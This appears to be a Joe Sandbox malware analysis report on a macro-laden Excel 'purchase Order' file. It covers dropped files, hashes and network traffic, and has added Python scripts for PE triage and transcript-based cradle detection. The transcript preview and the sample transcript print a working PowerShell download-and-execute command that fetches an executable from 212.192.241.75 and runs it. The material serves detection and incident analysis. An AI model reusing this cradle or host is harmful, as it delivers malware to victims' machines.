• Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, prod-w.nexus.live.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, config.officeapps.live.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
18:19:29  API Interceptor  38x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match        Associated Sample Name / URL                         Detection  Context
RAPMSB-ASRU  setup_installer.exe                                  malicious  212.192.241.62
             jGK42jrs2j.exe                                       malicious  212.192.241.62
             DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exe    malicious  212.192.241.62
             p3IJWYfJZw.exe                                       malicious  212.192.241.62
             SecuriteInfo.com.Variant.Razy.976213.13679.exe       malicious  212.192.241.164
             6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exe    malicious  212.192.241.62
             INQUIRY 567876.exe                                   malicious  212.192.241.149
             setup_x86_x64_install.exe                            malicious  212.192.241.62
             hAUSJxuc9n.exe                                       malicious  212.192.241.159
             0OeX2BsbUo.exe                                       malicious  212.192.241.62
             AB948F038175411DC326A1AAD83DF48D6B65632501551.exe    malicious  212.192.241.62
             FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exe    malicious  212.192.241.62
             365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe    malicious  212.192.241.62
             C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe    malicious  212.192.241.62
             setup_x86_x64_install.exe                            malicious  212.192.241.62
             Fri051e1e7444.exe                                    malicious  212.192.241.62
             wA5D1yZuTf.exe                                       malicious  212.192.241.62
             setup_x86_x64_install.exe                            malicious  212.192.241.62
             SecuriteInfo.com.Suspicious.Win32.Save.a.21156.exe   malicious  212.192.241.164
             setup_x86_x64_install.exe                            malicious  212.192.241.62

JA3 Fingerprints

No context

Dropped Files

Match                                                         Associated Sample Name / URL  Detection  Context
C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll  2jFfKOEefN.exe                malicious

Created / dropped Files

C:\Users\Public\eVJOpc.exe
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 267524
Entropy (8bit): 7.926792918769308
Encrypted: false
SSDEEP: 6144:hBlL/caNwUfNSYn6ZYbjBzDHYgXdjb3reiJXrrGp7cic:neaWysgzbLRq06p7cic
MD5: 0EDC34831B45EDED59BD2AEEF85AA41B
SHA1: 0C925FC8A0E257584E0BF7F55E9404C1AB9BA9C5
SHA-256: 2F939DE8B3D6388C270C1670C95A17BC0F17D0DF4EFADEABCD5D82411C3483FA
SHA-512: AEE07D0BF66C6B58A4E9892951B67076CB07B64E2028B53A9819F53ED8AE87EECCCA3744C2AB74476209C0177A26BE11DE42032E447D4C5AC029180998043F0A
Malicious: true
Antivirus:
• Avira, Detection: 100%
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 50%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t..........................h#...........................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
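Added triage example (not part of the Joe Sandbox report and not Joe Sandbox code): the Python below reproduces, from raw bytes, the hash, 8-bit entropy and PE section-name fields shown for the entry above, and flags the NSIS-specific .ndata section that is visible in the Preview. The IOC set holds the SHA-256 from this entry; the 7.0 entropy threshold and the minimal PE built by build_sample_pe() are assumptions for illustration, not the dropped eVJOpc.exe.

```python
"""Offline triage of a dropped-file entry (added example, not Joe Sandbox code)."""
import hashlib
import math
import struct
from collections import Counter

# SHA-256 copied from the report's entry for C:\Users\Public\eVJOpc.exe
REPORT_IOC_SHA256 = {
    "2f939de8b3d6388c270c1670c95a17bc0f17d0df4efadeabcd5d82411c3483fa",
}
# Assumed rule-of-thumb threshold: compressed or encrypted payloads sit near 8.0
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the byte histogram: 0.0 for constant data, 8.0 for uniform.
    Same metric as the report's 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256/SHA-512 hex digests, the four hashes the report lists."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256", "sha512")}


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> 'PE\\0\\0' signature -> COFF header -> section table.
    Returns [] instead of raising for anything that is not a well-formed PE,
    so it can be run over arbitrary dropped blobs."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes) -> dict:
    """Summarise one blob the way an analyst reads the report's dropped-file entry."""
    names = pe_section_names(data)
    ent = shannon_entropy(data)
    return {
        "is_pe": bool(names),
        "sections": names,
        "nsis_sfx": ".ndata" in names,        # NSIS keeps its compressed payload here
        "entropy": ent,
        "packed_or_encrypted": ent > PACKED_ENTROPY_THRESHOLD,
        "ioc_match": digests(data)["sha256"] in REPORT_IOC_SHA256,
    }


def build_sample_pe(section_names, payload=b"") -> bytes:
    """Constructed test input: a minimal PE32 image with the given section names.
    Only the headers are meaningful; it is not loadable and is not the real sample."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after DOS header
    opt = bytes(0xE0)                          # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(opt), 0x102)
    sections = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + opt + sections + payload


if __name__ == "__main__":
    sample = build_sample_pe([".text", ".rdata", ".data", ".ndata", ".rsrc"],
                             payload=bytes(range(256)) * 4)
    print(triage(sample))
```

To apply it to a real dropped file, read the file in binary mode and pass the bytes to triage(); an ioc_match of True together with nsis_sfx confirms the blob is the same NSIS self-extractor the report hashes, while a high entropy on a non-PE blob points at an encrypted payload that still needs unpacking.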
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\88AF1BA5-4E6A-4278-A045-D7218995DD99
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 139130
Entropy (8bit): 5.358454037752611
Encrypted: false
SSDEEP: 1536:HcQIfgxrBdA3gBwfnQ9DQW+zBY34Fi7nXboOidXVE6LWmE9:VWQ9DQW+zzXaH
MD5: 451384E8141B1AAE595FE40EFF25AF3B
SHA1: AFED56695A26279FD49E6CEE4F7CF7A59D09796F
SHA-256: 92B70E672D7EA22329DB556DC10B067961612862EC9F7CCFCB30708D09A7ABB9
SHA-512: 04A932915375608FDEE5B8BD1EBEE58F18E09A744F8F56AD3203C080EA55181FAA97E6F69F28B5850A99ABC1F5BB5FF80AA6E64046041A26567A63405FFB7B6E
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-27T16:19:08">.. Build: 16.0.14618.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\294DE970.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 1064 x 513, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):139201
                                                                                                                                                    Entropy (8bit):7.98388222737656
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:sWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yO:sWUMdF+Bcli6I37RBwcblAa
                                                                                                                                                    MD5:1007F58193E382DA00B74BD59C5AD1AD
                                                                                                                                                    SHA1:CBC27D302892B57019FCBD076ACEC67541B7C5A1
                                                                                                                                                    SHA-256:E5AFDB4BF82680681770132A53E16ED3341311D05BEB718AC0239B0D08B97218
                                                                                                                                                    SHA-512:65339D06D22255D2C6E42A0EF1B64EECD99509FD54A7E9EDBB899C1AEC0722DDAEB41462888387F95ED3135EC542900F3944793E2D658D9F1FEA8CA0345CEC28
                                                                                                                                                    Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):18084
Entropy (8bit):5.576639096938355
Encrypted:false
SSDEEP:384:Ut9Sr8q0JKgvYMiu+SBKne2julBLPIj779Yr90poyADYGy:8vY74Ke2ClV/+rpR
MD5:D80CF88941ACDB9070836B9E59562B47
SHA1:40833F137F4FA521B6D3194535D6CF7D402CAACB
SHA-256:770CEE562A6586C15DEB83393BC4A1489D7BFDA0B6BED136ED1C51C3EDAE8BA5
SHA-512:55C3AA8DE3609E44263D1E87C1379C7F4F986F3FBDD6DADDE3382BAF832693FD19EC243C94D4A1AFDB501324CF60DE0DDF13F746A887808CD6076A4BE3CBDD2A
Malicious:false
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_medz4hkj.nue.psm1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w0sohs1d.apj.ps1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\furesfhqs8032
Process:C:\Users\Public\eVJOpc.exe
File Type:data
Category:dropped
Size (bytes):215509
Entropy (8bit):7.994064433992795
Encrypted:true
SSDEEP:6144:LVg0zHWsVK/is8YuAEFrO1OmoYvv/I/iM6go0Gz:LVPHW0QutO1OmoYnkWgoD
MD5:99ED4663E61A60F161132D3B4F336BEC
SHA1:2D0C5DEF3417EF814F153F452D1D50A505AC72BD
SHA-256:19201F29ECFDF26C38E07687AA7DC637CF15D308AC3669C363B4CBEA8743ECA9
SHA-512:90830CF95675492D454754325E50EB24C4D26AEE0F5807DB8FD273B381A481269D02596B24AF18B28D01E302ECA881DE3D2BC803131DB45373491340D7EA2019
Malicious:false
C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll
Process:C:\Users\Public\eVJOpc.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):41984
Entropy (8bit):6.3618659378850175
Encrypted:false
SSDEEP:768:aOmBlKo/1fu+eHaZ7UTwSvOZ7LJV82SPVnKLtYcVRVo0WwAdFrOgSHgUN5lAUTtU:aBUS1m+QaZ0wyOZ7LJV82AVstYcbVT0T
MD5:2D7B5C9092A04DAE0BCCB1CDDC194B0B
SHA1:22745EC0D8C4C3F0BE58B24CA46AD87EE42C3B4C
SHA-256:C5D3FB8CC4B1BE9B9AABEEB14B7F4C12F3FCE5C8DFB0C1968C82D8B5C19B9245
SHA-512:A5F12E040E52924D80CF8A195F7ED9A69D732632C140B23D02203DBF19D61CAD2803042E909265EC5029CC81D2A65938CFB343985A37A85430E46363D45DED7B
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:
• Filename: 2jFfKOEefN.exe, Detection: malicious
C:\Users\user\Desktop\47E20000
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:Microsoft Excel 2007+
Category:dropped
Size (bytes):150311
Entropy (8bit):7.959939894048855
Encrypted:false
SSDEEP:3072:ekWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yC:bWUMdF+Bcli6I37RBwcblA+
MD5:590CBCAC7B119FB6CBDCEA132B1286AC
SHA1:3120B4825BB4DCF664123959AC4CD4EF371AE561
SHA-256:6419C770D98BA5789CFB33D4BA10B0FAD01C7FF18546E863C4C86F836584CC68
SHA-512:7E6C8814B07B59C984084CB5AABFB8F23D19C10513CC665D88385FB0951BEEB349B1E76E6246D56502280F37196FA3D92AF79AB3B1F516328906CE76BD936E92
Malicious:false
C:\Users\user\Desktop\47E20000:Zone.Identifier
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Preview: [ZoneTransfer]....ZoneId=0
C:\Users\user\Desktop\purchase Order.xlsm (copy)
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:Microsoft Excel 2007+
Category:dropped
Size (bytes):150311
Entropy (8bit):7.959939894048855
Encrypted:false
SSDEEP:3072:ekWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6yC:bWUMdF+Bcli6I37RBwcblA+
MD5:590CBCAC7B119FB6CBDCEA132B1286AC
SHA1:3120B4825BB4DCF664123959AC4CD4EF371AE561
SHA-256:6419C770D98BA5789CFB33D4BA10B0FAD01C7FF18546E863C4C86F836584CC68
SHA-512:7E6C8814B07B59C984084CB5AABFB8F23D19C10513CC665D88385FB0951BEEB349B1E76E6246D56502280F37196FA3D92AF79AB3B1F516328906CE76BD936E92
Malicious:true
                                                                                                                                                    C:\Users\user\Desktop\~$purchase Order.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\Users\user\Documents\20211027\PowerShell_transcript.061544.RzyXj49c.20211027181911.txt
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1312
                                                                                                                                                    Entropy (8bit):5.311478166774335
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:BxSAx1xvBn6x2DOXUWXQUS8YZ/WNHjeTKKjX4CIym1ZJXZRQUS8YZQDnxSAZNH:BZxHvh6oO3QUSzZeNqDYB1ZjRQUSzZKh
                                                                                                                                                    MD5:60EDD266F84904DF0B7E3662BB1EC068
                                                                                                                                                    SHA1:4943F079A8ED5A53737DBD00222CE005C1398EA6
                                                                                                                                                    SHA-256:668112E350B2B164CD138A766DC2C69568C4FE16AC8A3B723E4231833621860C
                                                                                                                                                    SHA-512:E4DE5AF50CAE7CD93827923E47A641A224DE76FA9BE3DEC3478864866A3BDF7B28515611C8CF94E92B2A2333950E6C7E39B99AFFE44829F90F732323BD2AA333
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211027181923..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe..Process ID: 6124..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211027181923..**********************..PS>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri h
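The transcript preview above carries the whole download cradle in its Host Application field: TLS 1.2 is forced, Invoke-WebRequest writes http://212.192.241.75/sam/new3.exe to $env:public\eVJOpc.exe, and explorer is used to launch it. The Python below is an added example and not part of this report: it parses a transcript header into fields, extracts the URL, the -OutFile target and the follow-on launch from that command line, and flags the download-then-execute pattern. The sample transcript is reconstructed from the preview fields shown above, with the preview's dot separators rendered as line breaks; the expansion of $env:public to C:\Users\Public is the Windows default and an assumption here, since the transcript does not record it.

```python
"""Extract download-cradle indicators from a PowerShell transcript header.

Added example (not part of the Joe Sandbox report). SAMPLE_TRANSCRIPT
reproduces the header fields shown in the report's file preview, with the
preview's dot separators rendered as line breaks.
"""
import re
from typing import Any, Dict

SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20211027181923
Username: computer\user
RunAs User: computer\user
Configuration Name:
Machine: 061544 (Microsoft Windows NT 10.0.17134.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Process ID: 6124
PSVersion: 5.1.17134.1
PSEdition: Desktop
**********************
**********************
Command start time: 20211027181923
**********************
PS>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
"""

BANNER = "**********************"
# Cmdlets, aliases and .NET methods that fetch content over the network.
DOWNLOADER_RE = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|wget|curl|Invoke-RestMethod|irm|"
    r"Start-BitsTransfer|DownloadFile|DownloadString|DownloadData)\b")
# Statements that hand a freshly written file to another process.
LAUNCHER_RE = re.compile(
    r"(?i)^(?:explorer|start|start-process|saps|cmd|rundll32|regsvr32|mshta)\b|^&")
URL_RE = re.compile(r"https?://[^\s;'\"]+")
OUTFILE_RE = re.compile(r"(?i)-OutFile\s+([^\s;]+)")
# Default value of $env:public on Windows; assumed, the transcript does not record it.
PUBLIC_DIR = r"C:\Users\Public"


def parse_transcript_header(text: str) -> Dict[str, str]:
    """Return the 'Key: Value' fields between the first two banner lines."""
    fields: Dict[str, str] = {}
    inside = False
    for line in text.splitlines():
        if line.strip() == BANNER:
            if inside:
                break  # the second banner closes the header block
            inside = True
            continue
        if inside and ": " in line:
            key, value = line.split(": ", 1)
            fields[key.strip()] = value.strip()
    return fields


def extract_cradle_iocs(cmdline: str) -> Dict[str, Any]:
    """Pull URLs, the -OutFile target and any follow-on launch out of one command line."""
    statements = [s.strip() for s in cmdline.split(";") if s.strip()]
    outfile = OUTFILE_RE.search(cmdline)
    return {
        "urls": URL_RE.findall(cmdline),
        "outfile": outfile.group(1) if outfile else "",
        "launched": [s for s in statements if LAUNCHER_RE.match(s)],
        "downloader": bool(DOWNLOADER_RE.search(cmdline)),
    }


def is_download_and_execute(cmdline: str) -> bool:
    """True when one command line fetches a file to disk and then runs something."""
    iocs = extract_cradle_iocs(cmdline)
    return iocs["downloader"] and bool(iocs["outfile"]) and bool(iocs["launched"])


def expand_env_public(path: str) -> str:
    """Resolve $env:public to its assumed default so the dropped path can be hunted for."""
    return re.sub(r"(?i)\$env:public", lambda _: PUBLIC_DIR, path)


def analyze(text: str) -> Dict[str, Any]:
    """Header fields plus cradle indicators for one transcript."""
    header = parse_transcript_header(text)
    cmdline = header.get("Host Application", "")
    result = extract_cradle_iocs(cmdline)
    result["download_and_execute"] = is_download_and_execute(cmdline)
    result["process_id"] = header.get("Process ID", "")
    result["dropped_path"] = expand_env_public(result["outfile"])
    return result


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_TRANSCRIPT).items():
        print(f"{key}: {value}")
```

The same functions apply to real transcripts under Documents\<date>\PowerShell_transcript.*.txt once transcription is enabled by policy; the Host Application line is the field to key on, because it records the full command line even when the -Command body is later obfuscated on screen.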

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.959887971852356
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                                    File name:purchase Order.xlsm
                                                                                                                                                    File size:150286
                                                                                                                                                    MD5:d1ad5761044b2abb12b78700f1a3a537
                                                                                                                                                    SHA1:7fed2064ae3681227f674608df64ff1d7c45a2ee
                                                                                                                                                    SHA256:8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
                                                                                                                                                    SHA512:0c6ec74a014e337ce2153e682ed5bbc3c059e5d3b6b2ec90e6ab3c74eeccff055c4c776020441471d6184721b87f5391fe4566cb6e9c7a0f3548816abc57d0ee
                                                                                                                                                    SSDEEP:3072:rEaWeriTte82+uLBcTvJxsQW6I6Aft9RBwcbKYWyFA6y7:rLWUMdF+Bcli6I37RBwcblAP
                                                                                                                                                    File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Network Behavior

                                                                                                                                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2021 18:19:34.210490942 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.259701967 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.259812117 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.262244940 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.293471098 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293539047 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293576956 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293591976 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.293616056 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293662071 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293699980 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293710947 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.293735981 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.293739080 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293777943 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293817043 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293853998 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.293857098 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.293891907 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.321578979 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321613073 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321630955 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321647882 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321665049 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321681023 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321697950 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321715117 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321731091 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
Oct 27, 2021 18:19:34.321731091 CEST | 49746 | 80 | 192.168.2.3 | 212.192.241.75
Oct 27, 2021 18:19:34.321748018 CEST | 80 | 49746 | 212.192.241.75 | 192.168.2.3
